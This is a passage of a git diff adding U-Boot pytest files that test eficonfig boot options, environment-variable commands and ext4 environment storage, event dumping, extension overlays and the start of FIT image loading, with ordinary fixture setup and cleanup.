enter key + press_up_down_enter_and_wait(0, 2, True, 'Quit') + + # Set Initrd file(initrd-2.img) + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrd-2.img" entry followed by the enter key + press_up_down_enter_and_wait(0, 1, True, 'Quit') + + # Set optional_data + press_up_down_enter_and_wait(0, 3, True, 'Optional Data:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('nocolor', None) + for i in ('Description: test 2', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-2.img', 'Optional Data: nocolor', 'Save', 'Quit'): + ubman.p.expect([i]) + + # Save the Boot Option + press_up_down_enter_and_wait(0, 4, True, 'Quit') + + # Change the Boot Order + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 1, False, 'Quit') + # move 'test 1' to the second entry + ubman.run_command(cmd='+', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + for i in ('test 2', 'test 1', 'host 0:1', 'Save', 'Quit'): + ubman.p.expect([i]) + # Save the BootOrder + press_up_down_enter_and_wait(0, 3, True, None) + check_current_is_maintenance_menu() + + # Check the newly added Boot Option is handled correctly + # Return to U-Boot console + press_escape_key(True) + ubman.run_command(cmd = 'bootefi bootmgr') + response = ubman.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x811d3515' in response + ubman.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 5: Change BootOrder and load it + # + ubman.run_command('eficonfig', wait_for_prompt=False) + + # Change the Boot Order + press_up_down_enter_and_wait(0, 2, True, None) + # Check the current BootOrder + for i in ('test 2', 'test 1', 'host 0:1', 'Save', 'Quit'): + ubman.p.expect([i]) + # move 'test 2' to the second entry + ubman.run_command(cmd='-', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + for i in ('test 1', 'test 2', 'host 0:1', 'Save', 'Quit'): + ubman.p.expect([i]) + # Save the BootOrder + press_up_down_enter_and_wait(0, 2, True, None) + check_current_is_maintenance_menu() + + # Return to U-Boot console + press_escape_key(True) + ubman.run_command(cmd = 'bootefi bootmgr') + response = ubman.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x181464af' in response + ubman.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 6: Delete Boot Option(label:test 2) + # + ubman.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Delete Boot Option' + press_up_down_enter_and_wait(0, 3, True, None) + # Check the current BootOrder + for i in ('test 1', 'test 2', 'Quit'): + ubman.p.expect([i]) + + # Delete 'test 2' + press_up_down_enter_and_wait(0, 1, True, None) + for i in ('test 1', 'Quit'): + ubman.p.expect([i]) + press_escape_key(False) + check_current_is_maintenance_menu() + # Return to U-Boot console + press_escape_key(True) + + # + # Test Case 7: Edit Boot Option + # + ubman.run_command('eficonfig', wait_for_prompt=False) + # Select 'Edit Boot Option' + press_up_down_enter_and_wait(0, 1, True, None) + # Check the current BootOrder + for i in ('test 1', 'Quit'): + ubman.p.expect([i]) + press_up_down_enter_and_wait(0, 0, True, None) + for i in ('Description: test 1', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-1.img', 'Optional Data: nocolor', 'Save', 'Quit'): + ubman.p.expect([i]) + + # Press the enter key to select 'Description:' entry, then enter Description + press_up_down_enter_and_wait(0, 0, True, 'Enter description:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('test 3', 'Quit') + + # Set EFI image(initrddump.efi) + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrddump.efi" entry followed by the enter key + press_up_down_enter_and_wait(0, 2, True, 'Quit') + + # Set Initrd file(initrd-2.img) + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrd-1.img" entry followed by the enter key + press_up_down_enter_and_wait(0, 1, True, 'Quit') + + # Set optional_data + press_up_down_enter_and_wait(0, 3, True, 'Optional Data:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('', None) + for i in ('Description: test 3', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-2.img', 'Optional Data:', 'Save', 'Quit'): + ubman.p.expect([i]) + + # Save the Boot Option + press_up_down_enter_and_wait(0, 4, True, 'Quit') + press_escape_key(False) + check_current_is_maintenance_menu() + + # Check the updated Boot Option is handled correctly + # Return to U-Boot console + press_escape_key(True) + ubman.run_command(cmd = 'bootefi bootmgr') + response = ubman.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x811d3515' in response + ubman.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 8: Delete Boot Option(label:test 3) + # + ubman.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Delete Boot Option' + press_up_down_enter_and_wait(0, 3, True, None) + # Check the current BootOrder + for i in ('test 3', 'Quit'): + ubman.p.expect([i]) + + # Delete 'test 3' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + press_escape_key(False) + check_current_is_maintenance_menu() + # Return to U-Boot console + press_escape_key(True) + + # remove the host device + ubman.run_command(cmd = f'host bind -r 0') + + # + # Test Case 9: No block device found + # + ubman.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Add Boot Option' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Set EFI image + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'No block device found!') + press_escape_key(False) + press_escape_key(False) + check_current_is_maintenance_menu() + # Return to U-Boot console + press_escape_key(True) diff --git a/test/py/tests/test_env.py b/test/py/tests/test_env.py new file mode 100644 index 00000000000..383e26c03b0 --- /dev/null +++ b/test/py/tests/test_env.py @@ -0,0 +1,650 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +""" +Test operation of shell commands relating to environment variables. +""" + +import os +import os.path +import re +from subprocess import call, CalledProcessError +import tempfile + +import pytest +import utils + +# FIXME: This might be useful for other tests; +# perhaps refactor it into ConsoleBase or some other state object? +class StateTestEnv(object): + """Container that represents the state of all U-Boot environment variables. + This enables quick determination of existant/non-existant variable + names. + """ + + def __init__(self, ubman): + """Initialize a new StateTestEnv object. + + Args: + ubman: A U-Boot console. + + Returns: + Nothing. + """ + + self.ubman = ubman + self.get_env() + self.set_var = self.get_non_existent_var() + + def get_env(self): + """Read all current environment variables from U-Boot. + + Args: + None. + + Returns: + Nothing. + """ + + if self.ubman.config.buildconfig.get( + 'config_version_variable', 'n') == 'y': + with self.ubman.disable_check('main_signon'): + response = self.ubman.run_command('printenv') + else: + response = self.ubman.run_command('printenv') + self.env = {} + for l in response.splitlines(): + if not '=' in l: + continue + (var, value) = l.split('=', 1) + self.env[var] = value + + def get_existent_var(self): + """Return the name of an environment variable that exists. + + Args: + None. + + Returns: + The name of an environment variable. + """ + + for var in self.env: + return var + + def get_non_existent_var(self): + """Return the name of an environment variable that does not exist. + + Args: + None. + + Returns: + The name of an environment variable. + """ + + n = 0 + while True: + var = 'test_env_' + str(n) + if var not in self.env: + return var + n += 1 + +ste = None +@pytest.fixture(scope='function') +def state_test_env(ubman): + """pytest fixture to provide a StateTestEnv object to tests.""" + + global ste + if not ste: + ste = StateTestEnv(ubman) + return ste + +def unset_var(state_test_env, var): + """Unset an environment variable. + + This both executes a U-Boot shell command and updates a StateTestEnv + object. + + Args: + state_test_env: The StateTestEnv object to update. + var: The variable name to unset. + + Returns: + Nothing. + """ + + state_test_env.ubman.run_command('setenv %s' % var) + if var in state_test_env.env: + del state_test_env.env[var] + +def set_var(state_test_env, var, value): + """Set an environment variable. + + This both executes a U-Boot shell command and updates a StateTestEnv + object. + + Args: + state_test_env: The StateTestEnv object to update. + var: The variable name to set. + value: The value to set the variable to. + + Returns: + Nothing. + """ + + bc = state_test_env.ubman.config.buildconfig + if bc.get('config_hush_parser', None): + quote = '"' + else: + quote = '' + if ' ' in value: + pytest.skip('Space in variable value on non-Hush shell') + + state_test_env.ubman.run_command( + 'setenv %s %s%s%s' % (var, quote, value, quote)) + state_test_env.env[var] = value + +def validate_empty(state_test_env, var): + """Validate that a variable is not set, using U-Boot shell commands. + + Args: + var: The variable name to test. + + Returns: + Nothing. + """ + + response = state_test_env.ubman.run_command('echo ${%s}' % var) + assert response == '' + +def validate_set(state_test_env, var, value): + """Validate that a variable is set, using U-Boot shell commands. + + Args: + var: The variable name to test. + value: The value the variable is expected to have. + + Returns: + Nothing. + """ + + # echo does not preserve leading, internal, or trailing whitespace in the + # value. printenv does, and hence allows more complete testing. + response = state_test_env.ubman.run_command('printenv %s' % var) + assert response == ('%s=%s' % (var, value)) + +@pytest.mark.boardspec('sandbox') +def test_env_initial_env_file(ubman): + """Test that the u-boot-initial-env make target works""" + builddir = 'O=' + ubman.config.build_dir + envfile = ubman.config.build_dir + '/u-boot-initial-env' + + # remove if already exists from an older run + try: + os.remove(envfile) + except: + pass + + utils.run_and_log(ubman, ['make', builddir, 'u-boot-initial-env']) + + assert os.path.exists(envfile) + + # assume that every environment has a board variable, e.g. board=sandbox + with open(envfile, 'r') as file: + env = file.read() + regex = re.compile('board=.+\\n') + assert re.search(regex, env) + +def test_env_echo_exists(state_test_env): + """Test echoing a variable that exists.""" + + var = state_test_env.get_existent_var() + value = state_test_env.env[var] + validate_set(state_test_env, var, value) + +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_echo_non_existent(state_test_env): + """Test echoing a variable that doesn't exist.""" + + var = state_test_env.set_var + validate_empty(state_test_env, var) + +def test_env_printenv_non_existent(state_test_env): + """Test printenv error message for non-existant variables.""" + + var = state_test_env.set_var + c = state_test_env.ubman + with c.disable_check('error_notification'): + response = c.run_command('printenv %s' % var) + assert response == '## Error: "%s" not defined' % var + +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_unset_non_existent(state_test_env): + """Test unsetting a nonexistent variable.""" + + var = state_test_env.get_non_existent_var() + unset_var(state_test_env, var) + validate_empty(state_test_env, var) + +def test_env_set_non_existent(state_test_env): + """Test set a non-existant variable.""" + + var = state_test_env.set_var + value = 'foo' + set_var(state_test_env, var, value) + validate_set(state_test_env, var, value) + +def test_env_set_existing(state_test_env): + """Test setting an existant variable.""" + + var = state_test_env.set_var + value = 'bar' + set_var(state_test_env, var, value) + validate_set(state_test_env, var, value) + +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_unset_existing(state_test_env): + """Test unsetting a variable.""" + + var = state_test_env.set_var + unset_var(state_test_env, var) + validate_empty(state_test_env, var) + +def test_env_expansion_spaces(state_test_env): + """Test expanding a variable that contains a space in its value.""" + + var_space = None + var_test = None + try: + var_space = state_test_env.get_non_existent_var() + set_var(state_test_env, var_space, ' ') + + var_test = state_test_env.get_non_existent_var() + value = ' 1${%(var_space)s}${%(var_space)s} 2 ' % locals() + set_var(state_test_env, var_test, value) + value = ' 1 2 ' + validate_set(state_test_env, var_test, value) + finally: + if var_space: + unset_var(state_test_env, var_space) + if var_test: + unset_var(state_test_env, var_test) + +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_checksum_no_size(state_test_env): + """Test that omitted ('-') size parameter with checksum validation fails the + env import function. + """ + c = state_test_env.ubman + ram_base = utils.find_ram_base(state_test_env.ubman) + addr = '%08x' % ram_base + + with c.disable_check('error_notification'): + response = c.run_command('env import -c %s -' % addr) + assert response == '## Error: external checksum format must pass size' + +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_whitelist_checksum_no_size(state_test_env): + """Test that omitted ('-') size parameter with checksum validation fails the + env import function when variables are passed as parameters. + """ + c = state_test_env.ubman + ram_base = utils.find_ram_base(state_test_env.ubman) + addr = '%08x' % ram_base + + with c.disable_check('error_notification'): + response = c.run_command('env import -c %s - foo1 foo2 foo4' % addr) + assert response == '## Error: external checksum format must pass size' + +@pytest.mark.buildconfigspec('cmd_exportenv') +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_whitelist(state_test_env): + """Test importing only a handful of env variables from an environment.""" + c = state_test_env.ubman + ram_base = utils.find_ram_base(state_test_env.ubman) + addr = '%08x' % ram_base + + set_var(state_test_env, 'foo1', 'bar1') + set_var(state_test_env, 'foo2', 'bar2') + set_var(state_test_env, 'foo3', 'bar3') + + c.run_command('env export %s' % addr) + + unset_var(state_test_env, 'foo1') + set_var(state_test_env, 'foo2', 'test2') + set_var(state_test_env, 'foo4', 'bar4') + + # no foo1 in current env, foo2 overridden, foo3 should be of the value + # before exporting and foo4 should be of the value before importing. + c.run_command('env import %s - foo1 foo2 foo4' % addr) + + validate_set(state_test_env, 'foo1', 'bar1') + validate_set(state_test_env, 'foo2', 'bar2') + validate_set(state_test_env, 'foo3', 'bar3') + validate_set(state_test_env, 'foo4', 'bar4') + + # Cleanup test environment + unset_var(state_test_env, 'foo1') + unset_var(state_test_env, 'foo2') + unset_var(state_test_env, 'foo3') + unset_var(state_test_env, 'foo4') + +@pytest.mark.buildconfigspec('cmd_exportenv') +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_whitelist_delete(state_test_env): + + """Test importing only a handful of env variables from an environment, with. + deletion if a var A that is passed to env import is not in the + environment to be imported. + """ + c = state_test_env.ubman + ram_base = utils.find_ram_base(state_test_env.ubman) + addr = '%08x' % ram_base + + set_var(state_test_env, 'foo1', 'bar1') + set_var(state_test_env, 'foo2', 'bar2') + set_var(state_test_env, 'foo3', 'bar3') + + c.run_command('env export %s' % addr) + + unset_var(state_test_env, 'foo1') + set_var(state_test_env, 'foo2', 'test2') + set_var(state_test_env, 'foo4', 'bar4') + + # no foo1 in current env, foo2 overridden, foo3 should be of the value + # before exporting and foo4 should be empty. + c.run_command('env import -d %s - foo1 foo2 foo4' % addr) + + validate_set(state_test_env, 'foo1', 'bar1') + validate_set(state_test_env, 'foo2', 'bar2') + validate_set(state_test_env, 'foo3', 'bar3') + validate_empty(state_test_env, 'foo4') + + # Cleanup test environment + unset_var(state_test_env, 'foo1') + unset_var(state_test_env, 'foo2') + unset_var(state_test_env, 'foo3') + unset_var(state_test_env, 'foo4') + +@pytest.mark.buildconfigspec('cmd_nvedit_info') +def test_env_info(state_test_env): + + """Test 'env info' command with all possible options. + """ + c = state_test_env.ubman + + response = c.run_command('env info') + nb_line = 0 + for l in response.split('\n'): + if 'env_valid = ' in l: + assert '= invalid' in l or '= valid' in l or '= redundant' in l + nb_line += 1 + elif 'env_ready =' in l or 'env_use_default =' in l: + assert '= true' in l or '= false' in l + nb_line += 1 + else: + assert True + assert nb_line == 3 + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response or \ + "Environment was loaded from persistent storage" in response + assert 'Environment can be persisted' in response or \ + "Environment cannot be persisted" in response + + response = c.run_command('env info -p -d -q') + assert response == "" + + response = c.run_command('env info -p -q') + assert response == "" + + response = c.run_command('env info -d -q') + assert response == "" + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_nvedit_info') +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_info_sandbox(state_test_env): + """Test 'env info' command result with several options on sandbox + with a known ENV configuration: ready & default & persistent + """ + c = state_test_env.ubman + + response = c.run_command('env info') + assert 'env_ready = true' in response + assert 'env_use_default = true' in response + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response + assert 'Environment cannot be persisted' in response + + response = c.run_command('env info -d -q') + response = c.run_command('echo $?') + assert response == "0" + + response = c.run_command('env info -p -q') + response = c.run_command('echo $?') + assert response == "1" + + response = c.run_command('env info -d -p -q') + response = c.run_command('echo $?') + assert response == "1" + +def mk_env_ext4(state_test_env): + + """Create a empty ext4 file system volume.""" + c = state_test_env.ubman + filename = 'env.ext4.img' + persistent = c.config.persistent_data_dir + '/' + filename + fs_img = c.config.result_dir + '/' + filename + + if os.path.exists(persistent): + c.log.action('Disk image file ' + persistent + ' already exists') + else: + # Some distributions do not add /sbin to the default PATH, where mkfs.ext4 lives + os.environ["PATH"] += os.pathsep + '/sbin' + try: + utils.run_and_log(c, 'dd if=/dev/zero of=%s bs=1M count=16' % persistent) + utils.run_and_log(c, 'mkfs.ext4 %s' % persistent) + sb_content = utils.run_and_log(c, 'tune2fs -l %s' % persistent) + if 'metadata_csum' in sb_content: + utils.run_and_log(c, 'tune2fs -O ^metadata_csum %s' % persistent) + except CalledProcessError: + call('rm -f %s' % persistent, shell=True) + raise + + utils.run_and_log(c, ['cp', '-f', persistent, fs_img]) + return fs_img + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('cmd_nvedit_info') +@pytest.mark.buildconfigspec('cmd_nvedit_load') +@pytest.mark.buildconfigspec('cmd_nvedit_select') +@pytest.mark.buildconfigspec('env_is_in_ext4') +def test_env_ext4(state_test_env): + + """Test ENV in EXT4 on sandbox.""" + c = state_test_env.ubman + fs_img = '' + try: + fs_img = mk_env_ext4(state_test_env) + + c.run_command('host bind 0 %s' % fs_img) + + response = c.run_command('ext4ls host 0:0') + assert 'uboot.env' not in response + + # force env location: EXT4 (prio 1 in sandbox) + response = c.run_command('env select EXT4') + assert 'Select Environment on EXT4: OK' in response + + response = c.run_command('env save') + assert 'Saving Environment to EXT4' in response + + response = c.run_command('env load') + assert 'Loading Environment from EXT4... OK' in response + + response = c.run_command('ext4ls host 0:0') + assert '8192 uboot.env' in response + + response = c.run_command('env info') + assert 'env_valid = valid' in response + assert 'env_ready = true' in response + assert 'env_use_default = false' in response + + response = c.run_command('env info -p -d') + assert 'Environment was loaded from persistent storage' in response + assert 'Environment can be persisted' in response + + response = c.run_command('env info -d -q') + assert response == "" + response = c.run_command('echo $?') + assert response == "1" + + response = c.run_command('env info -p -q') + assert response == "" + response = c.run_command('echo $?') + assert response == "0" + + response = c.run_command('env erase') + assert 'OK' in response + + response = c.run_command('env load') + assert 'Loading Environment from EXT4... ' in response + assert 'bad CRC, using default environment' in response + + response = c.run_command('env info') + assert 'env_valid = invalid' in response + assert 'env_ready = true' in response + assert 'env_use_default = true' in response + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response + assert 'Environment can be persisted' in response + + # restore env location: NOWHERE (prio 0 in sandbox) + response = c.run_command('env select nowhere') + assert 'Select Environment on nowhere: OK' in response + + response = c.run_command('env load') + assert 'Loading Environment from nowhere... OK' in response + + response = c.run_command('env info') + assert 'env_valid = invalid' in response + assert 'env_ready = true' in response + assert 'env_use_default = true' in response + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response + assert 'Environment cannot be persisted' in response + + finally: + if fs_img: + call('rm -f %s' % fs_img, shell=True) + +def test_env_text(ubman): + """Test the script that converts the environment to a text file""" + + def check_script(intext, expect_val): + """Check a test case + + Args: + intext: Text to pass to the script + expect_val: Expected value of the CONFIG_EXTRA_ENV_TEXT string, or + None if we expect it not to be defined + """ + with tempfile.TemporaryDirectory() as path: + fname = os.path.join(path, 'infile') + with open(fname, 'w') as inf: + print(intext, file=inf) + result = utils.run_and_log(ubman, ['awk', '-f', script, fname]) + if expect_val is not None: + expect = '#define CONFIG_EXTRA_ENV_TEXT "%s"\n' % expect_val + assert result == expect + else: + assert result == '' + + script = os.path.join(ubman.config.source_dir, 'scripts', 'env2string.awk') + + # simple script with a single var + check_script('fred=123', 'fred=123\\0') + + # no vars + check_script('', None) + + # two vars + check_script('''fred=123 +mary=456''', 'fred=123\\0mary=456\\0') + + # blank lines + check_script('''fred=123 + + +mary=456 + +''', 'fred=123\\0mary=456\\0') + + # append + check_script('''fred=123 +mary=456 +fred+= 456''', 'fred=123 456\\0mary=456\\0') + + # append from empty + check_script('''fred= +mary=456 +fred+= 456''', 'fred= 456\\0mary=456\\0') + + # variable with + in it + check_script('fred+mary=123', 'fred+mary=123\\0') + + # ignores variables that are empty + check_script('''fred= +fred+= +mary=456''', 'mary=456\\0') + + # single-character env name + check_script('''m=123 +e=456 +m+= 456''', 'e=456\\0m=123 456\\0') + + # contains quotes + check_script('''fred="my var" +mary=another"''', 'fred=\\"my var\\"\\0mary=another\\"\\0') + + # variable name ending in + + check_script('''fred\\+=my var +fred++= again''', 'fred+=my var again\\0') + + # variable name containing + + check_script('''fred+jane=both +fred+jane+=again +mary=456''', 'fred+jane=bothagain\\0mary=456\\0') + + # multi-line vars - new vars always start at column 1 + check_script('''fred=first + second +\tthird with tab + + after blank + confusing=oops +mary=another"''', 'fred=first second third with tab after blank confusing=oops\\0mary=another\\"\\0') + + # real-world example + check_script('''ubifs_boot= + env exists bootubipart || + env set bootubipart UBI; + env exists bootubivol || + env set bootubivol boot; + if ubi part ${bootubipart} && + ubifsmount ubi${devnum}:${bootubivol}; + then + devtype=ubi; + run scan_dev_for_boot; + fi +''', + 'ubifs_boot=env exists bootubipart || env set bootubipart UBI; ' + 'env exists bootubivol || env set bootubivol boot; ' + 'if ubi part ${bootubipart} && ubifsmount ubi${devnum}:${bootubivol}; ' + 'then devtype=ubi; run scan_dev_for_boot; fi\\0') diff --git a/test/py/tests/test_event_dump.py b/test/py/tests/test_event_dump.py new file mode 100644 index 00000000000..b9d48f54dc2 --- /dev/null +++ b/test/py/tests/test_event_dump.py @@ -0,0 +1,25 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2021 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import pytest +import re +import utils + +# This is only a partial test - coverting 64-bit sandbox. It does not test +# big-endian images, nor 32-bit images +@pytest.mark.boardspec('sandbox') +def test_event_dump(ubman): + """Test that the "help" command can be executed.""" + sandbox = ubman.config.build_dir + '/u-boot' + out = utils.run_and_log(ubman, ['scripts/event_dump.py', sandbox]) + expect = '''.*Event type Id Source location +-------------------- ------------------------------ ------------------------------ +EVT_FT_FIXUP bootmeth_vbe_ft_fixup .*boot/vbe_request.c:.* +EVT_FT_FIXUP bootmeth_vbe_simple_ft_fixup .*boot/vbe_simple_os.c:.* +EVT_LAST_STAGE_INIT alloc_write_acpi_tables .*lib/acpi/acpi_table.c:.* +EVT_LAST_STAGE_INIT efi_block_device_create .*lib/efi_driver/efi_block_device.c:.* +EVT_LAST_STAGE_INIT install_smbios_table .*lib/efi_loader/efi_smbios.c:.* +EVT_MISC_INIT_F sandbox_early_getopt_check .*arch/sandbox/cpu/start.c:.* +EVT_TEST h_adder_simple .*test/common/event.c:''' + assert re.match(expect, out, re.MULTILINE) is not None diff --git a/test/py/tests/test_extension.py b/test/py/tests/test_extension.py new file mode 100644 index 00000000000..61223496054 --- /dev/null +++ b/test/py/tests/test_extension.py @@ -0,0 +1,55 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020 +# Author: Kory Maincent <kory.maincent@bootlin.com> + +# Test U-Boot's "extension" commands. + +import os +import pytest +import utils + +overlay_addr = 0x1000 + +SANDBOX_DTB='arch/sandbox/dts/sandbox.dtb' +OVERLAY_DIR='arch/sandbox/dts/' + +def load_dtb(ubman): + ubman.log.action('Loading devicetree to RAM...') + ubman.run_command('host load hostfs - $fdt_addr_r %s' % (os.path.join(ubman.config.build_dir, SANDBOX_DTB))) + ubman.run_command('fdt addr $fdt_addr_r') + +@pytest.mark.buildconfigspec('cmd_fdt') +@pytest.mark.boardspec('sandbox') +def test_extension(ubman): + """Test the 'extension' command.""" + + load_dtb(ubman) + + output = ubman.run_command('extension list') + # extension_bootdev_hunt may have already run. + # Without reboot we cannot make any assumption here. + # assert('No extension' in output) + + output = ubman.run_command('extension scan') + assert output == 'Found 2 extension board(s).' + + output = ubman.run_command('extension list') + assert('overlay0.dtbo' in output) + assert('overlay1.dtbo' in output) + + ubman.run_command_list([ + 'setenv extension_overlay_addr %s' % (overlay_addr), + 'setenv extension_overlay_cmd \'host load hostfs - ${extension_overlay_addr} %s${extension_overlay_name}\'' % (os.path.join(ubman.config.build_dir, OVERLAY_DIR))]) + + output = ubman.run_command('extension apply 0') + assert('bytes read' in output) + + output = ubman.run_command('fdt print') + assert('button3' in output) + + output = ubman.run_command('extension apply all') + assert('bytes read' in output) + + output = ubman.run_command('fdt print') + assert('button4' in output) + diff --git a/test/py/tests/test_fit.py b/test/py/tests/test_fit.py new file mode 100755 index 00000000000..619f73153a0 --- /dev/null +++ b/test/py/tests/test_fit.py @@ -0,0 +1,409 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2013, Google Inc. +# +# Sanity check of the FIT handling in U-Boot + +import os +import pytest +import struct +import utils +import fit_util + +# Define a base ITS which we can adjust using % and a dictionary +base_its = ''' +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel-1 { + data = /incbin/("%(kernel)s"); + type = "kernel"; + arch = "sandbox"; + os = "linux"; + compression = "%(compression)s"; + load = <0x40000>; + entry = <0x8>; + }; + kernel-2 { + data = /incbin/("%(loadables1)s"); + type = "kernel"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + %(loadables1_load)s + entry = <0x0>; + }; + fdt-1 { + description = "snow"; + data = /incbin/("%(fdt)s"); + type = "flat_dt"; + arch = "sandbox"; + %(fdt_load)s + compression = "%(compression)s"; + signature-1 { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + }; + }; + ramdisk-1 { + description = "snow"; + data = /incbin/("%(ramdisk)s"); + type = "ramdisk"; + arch = "sandbox"; + os = "linux"; + %(ramdisk_load)s + compression = "%(compression)s"; + }; + ramdisk-2 { + description = "snow"; + data = /incbin/("%(loadables2)s"); + type = "ramdisk"; + arch = "sandbox"; + os = "linux"; + %(loadables2_load)s + compression = "none"; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel-1"; + fdt = "fdt-1"; + %(ramdisk_config)s + %(loadables_config)s + }; + }; +}; +''' + +# Define a base FDT - currently we don't use anything in this +base_fdt = ''' +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <0>; + + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + reg = <0>; + }; +}; +''' + +# This is the U-Boot script that is run for each test. First load the FIT, +# then run the 'bootm' command, then save out memory from the places where +# we expect 'bootm' to write things. Then quit. +base_script = ''' +host load hostfs 0 %(fit_addr)x %(fit)s +fdt addr %(fit_addr)x +bootm start %(fit_addr)x +bootm loados +host save hostfs 0 %(kernel_addr)x %(kernel_out)s %(kernel_size)x +host save hostfs 0 %(fdt_addr)x %(fdt_out)s %(fdt_size)x +host save hostfs 0 %(ramdisk_addr)x %(ramdisk_out)s %(ramdisk_size)x +host save hostfs 0 %(loadables1_addr)x %(loadables1_out)s %(loadables1_size)x +host save hostfs 0 %(loadables2_addr)x %(loadables2_out)s %(loadables2_size)x +''' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +def test_fit(ubman): + def make_fname(leaf): + """Make a temporary filename + + Args: + leaf: Leaf name of file to create (within temporary directory) + Return: + Temporary filename + """ + return os.path.join(ubman.config.build_dir, leaf) + + def filesize(fname): + """Get the size of a file + + Args: + fname: Filename to check + Return: + Size of file in bytes + """ + return os.stat(fname).st_size + + def read_file(fname): + """Read the contents of a file + + Args: + fname: Filename to read + Returns: + Contents of file as a string + """ + with open(fname, 'rb') as fd: + return fd.read() + + def make_ramdisk(filename, text): + """Make a sample ramdisk with test data + + Returns: + Filename of ramdisk created + """ + fname = make_fname(filename) + data = '' + for i in range(100): + data += '%s %d was seldom used in the middle ages\n' % (text, i) + with open(fname, 'w') as fd: + print(data, file=fd) + return fname + + def make_compressed(filename): + utils.run_and_log(ubman, ['gzip', '-f', '-k', filename]) + return filename + '.gz' + + def find_matching(text, match): + """Find a match in a line of text, and return the unmatched line portion + + This is used to extract a part of a line from some text. The match string + is used to locate the line - we use the first line that contains that + match text. + + Once we find a match, we discard the match string itself from the line, + and return what remains. + + TODO: If this function becomes more generally useful, we could change it + to use regex and return groups. + + Args: + text: Text to check (list of strings, one for each command issued) + match: String to search for + Return: + String containing unmatched portion of line + Exceptions: + ValueError: If match is not found + + >>> find_matching(['first line:10', 'second_line:20'], 'first line:') + '10' + >>> find_matching(['first line:10', 'second_line:20'], 'second line') + Traceback (most recent call last): + ... + ValueError: Test aborted + >>> find_matching('first line:10\', 'second_line:20'], 'second_line:') + '20' + >>> find_matching('first line:10\', 'second_line:20\nthird_line:30'], + 'third_line:') + '30' + """ + __tracebackhide__ = True + for line in '\n'.join(text).splitlines(): + pos = line.find(match) + if pos != -1: + return line[:pos] + line[pos + len(match):] + + pytest.fail("Expected '%s' but not found in output") + + def check_equal(expected_fname, actual_fname, failure_msg): + """Check that a file matches its expected contents + + This is always used on out-buffers whose size is decided by the test + script anyway, which in some cases may be larger than what we're + actually looking for. So it's safe to truncate it to the size of the + expected data. + + Args: + expected_fname: Filename containing expected contents + actual_fname: Filename containing actual contents + failure_msg: Message to print on failure + """ + expected_data = read_file(expected_fname) + actual_data = read_file(actual_fname) + if len(expected_data) < len(actual_data): + actual_data = actual_data[:len(expected_data)] + assert expected_data == actual_data, failure_msg + + def check_not_equal(expected_fname, actual_fname, failure_msg): + """Check that a file does not match its expected contents + + Args: + expected_fname: Filename containing expected contents + actual_fname: Filename containing actual contents + failure_msg: Message to print on failure + """ + expected_data = read_file(expected_fname) + actual_data = read_file(actual_fname) + assert expected_data != actual_data, failure_msg + + def run_fit_test(mkimage): + """Basic sanity check of FIT loading in U-Boot + + TODO: 